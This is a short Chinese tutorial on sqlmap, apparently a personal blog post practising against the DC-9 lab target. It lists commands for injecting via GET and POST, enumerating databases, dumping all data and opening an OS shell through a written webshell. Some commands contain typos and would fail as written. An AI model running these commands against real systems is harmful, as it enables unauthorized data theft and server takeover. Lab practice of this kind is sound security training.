sqlmap基本使用方法

本文只介绍sqlmap的简单使用方法，参考官方文档

https://github.com/sqlmapproject/sqlmap/wiki/Usage

csdn师傅

https://blog.csdn.net/Breeze_CAT/article/details/80628392

个人建议，具体参数直接看csdn师傅的即可，本文以DC9靶场作为目标进行练习，使用sqlmap获取目标数据或权限

GET型

sqlmap -u http://192.168.43.143/ceshi.php?id=1 --banth --level 4 

-u 输入自己的目标地址
--batch 自动输入选项的属性值
--level 设置测试的等级（1-5，默认为1）lv2：cookie注入; lv3：user-agent注入，lv4:refere注入; lv5：host注入
POST型
可以获取对应地址的请求包，使用bp抓包保存即可

sqlmap -u ceshi.txt --batch --level 4

或者

sqlmap -u http://192.168.43.143/results.php   --method=POST --data="search=1" --level 4 --batch

--method 选择传参的方式
--data 选择传入的参数

sqlmap -u http://192.168.43.143/results.php   --method=POST --data="search=1" --level 4 --batch --random-agent

--random-agent 采用随机UA头
sqlmap -r ceshi.txt --batch --current-db 查看当前数据库
--current-db 查看当前数据库
查询数据库内容
查看拥有的数据库名称

sqlmap -r ceshi.txt --batch --dbs --level 4

选择数据库，查询表名

sqlmap -r cesh.txt --batch -D shujuku --tables

查询表格内列名

sqlmap -r ceshi.txt --batch -D shjuku -T biao --columns

查看表格内某些列内容

sqlmap -r ceshi.txt --batch -D shujuku -T biao -C id,username --dump

--dump 下载的意思，前面跟的参数是需要下载的内容

sqlmap -r ceshi.txt --batch --dump-all

--dump-all 代表下载全部的意思,也就是脱裤操作
查看数据库，表格内容的对应关系

sqlmap -r ceshi.txt --schema 

--schema 目标数据库数据库系统管理模式,类似于拓扑图的一种
写入木马，执行命令

sqlmap -r ceshi.txt --os-shell 

sqlmap会自动查找路径写入shell
指纹识别

sqlmap -r ceshi.txt -f --dbs 

当目标存在注入时，使用-f参数即可获取到目标的操作系统信息